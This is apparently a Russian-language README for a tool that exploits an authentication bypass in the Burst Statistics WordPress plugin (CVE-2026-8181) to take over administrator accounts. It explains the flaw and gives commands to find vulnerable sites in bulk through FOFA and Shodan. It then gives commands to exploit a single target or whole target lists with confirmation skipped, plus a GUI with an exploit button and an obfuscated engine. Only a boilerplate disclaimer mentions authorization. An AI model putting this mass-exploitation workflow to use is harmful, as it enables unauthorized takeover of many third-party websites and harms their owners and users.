
CVE-2026-8181 — Burst Statistics WordPress plugin Authentication Bypass (CVSS 9.8) to Admin Account Takeover. Mass scanner with FOFA/Shodan integration and modern GUI.
CVSS 9.8 (Критический) — Обход аутентификации с захватом учётной записи администратора
CVE-2026-8181 — это уязвимость обхода аутентификации (Authentication Bypass) в плагине WordPress Burst Statistics версий с 3.4.0 по 3.4.1.1. Плагин используется на более чем 200 000 сайтах WordPress в качестве приватной альтернативы Google Analytics.
Уязвимость позволяет неавторизованному атакующему, знающему имя пользователя администратора:
Функция is_mainwp_authenticated() в class-mainwp-proxy.php некорректно проверяет возвращаемое значение wp_authenticate_application_password(). Эта функция возвращает null (а не WP_Error) при вызове вне контекста REST API, а код проверяет только is_wp_error(). Поскольку null не является WP_Error, аутентификация считается успешной.
# 1. Клонируйте репозиторий
git clone https://github.com/YOUR_USERNAME/CVE-2026-8181.git
cd CVE-2026-8181
# 2. Установите зависимости
py -3.11 -m pip install -r requirements.txt
# 3. Подготовьте .env (для сканирования через FOFA / Shodan)
echo [email protected] > .env
echo FOFA_KEY=your_fofa_key >> .env
echo SHODAN_KEY=your_shodan_key >> .env
# 4. Запустите (выберите один из вариантов):
# Современный GUI (рекомендуется)
py -3.11 gui_modern.py
# Или дважды щёлкните run.bat
run.bat
# Или CLI: непосредственная эксплуатация одной цели
py -3.11 CVE-2026-8181.py -t https://target.com -u admin --no-confirm
# Или массовая эксплуатация из файла
py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm
# Или сначала просканируйте цели, затем эксплуатируйте
py -3.11 finder.py --file list.txt
py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm
Дважды щёлкните run.bat или выполните:
py -3.11 gui_modern.py

Современный графический интерфейс CVE-2026-8181 с 3 вкладками
На вкладке Scan: выберите источник целей (FOFA/Shodan из .env, файл или вручную) → нажмите SCAN TARGETS На вкладке Exploit: введите имя администратора → нажмите EXPLOIT

Инструмент находит уязвимые цели и готов к эксплуатации
Если эксплуатация прошла успешно, атакующий получает полный доступ в качестве администратора:

Панель администратора WordPress после успешной эксплуатации
CVE-2026-8181/
├── CVE-2026-8181.py # Основной движок эксплуатации (PyArmor)
├── gui_modern.py # Современный GUI-обёртка (рекомендуется)
├── finder.py # Сканер целей (FOFA / Shodan / Файл)
├── run.bat # Запуск одним щелчком
├── requirements.txt # Зависимости Python
├── .env # Ключи API (игнорируется git)
├── .gitignore
├── Dork.txt # Google Dork
├── pyarmor_runtime_000000/ # Среда выполнения PyArmor (Python 3.11)
├── system/ # Исходные модули (обфусцированы)
└── img/ # Скриншоты руководства
├── 1.png
├── 2.png
└── 3.png
.env.envТолько для образовательных целей и авторизованного тестирования на проникновение. Использование без разрешения в системах, которые вам не принадлежат, незаконно. Используйте только на сайтах, которыми вы владеете или на которые имеете письменное разрешение.
| Флаг | Описание |
|---|
-t, --target | URL цели (одиночная) |
-l, --list | Файл со списком целей |
-u, --username | Имя пользователя администратора (по умолчанию: admin) |
-T, --threads | Количество потоков (по умолчанию: 10) |
-o, --output | Файл для вывода результатов |
-v, --verbose | Вывод отладочной информации |
--timeout | Таймаут запроса (секунды) |
--no-confirm | Пропустить подтверждение |